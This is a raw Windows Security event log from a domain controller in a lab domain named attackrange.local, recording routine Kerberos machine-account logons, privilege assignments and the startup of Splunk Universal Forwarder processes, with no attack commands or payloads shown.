Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265172
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CC5A8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65034
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:01:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265171
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8CC5A8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:01:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265173
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x8CB268
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:01:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265174
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8CC5A8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:01:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265177
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8CD3AC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:01:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265176
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CD3AC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65043
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:01:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265175
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8CD3AC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:02:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265178
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265180
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1960
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265179
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x280
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265181
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265183
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265182
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265184
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bc4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265190
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D0497
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265189
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D0497
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65053
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265188
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D0497
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265187
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D042B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265186
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D042B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65052
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265185
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D042B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:02:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265193
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D1038
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:02:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265192
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D1038
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65059
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:02:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265191
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D1038
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:03:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265194
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:03:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265196
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1784
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:03:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265195
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b20
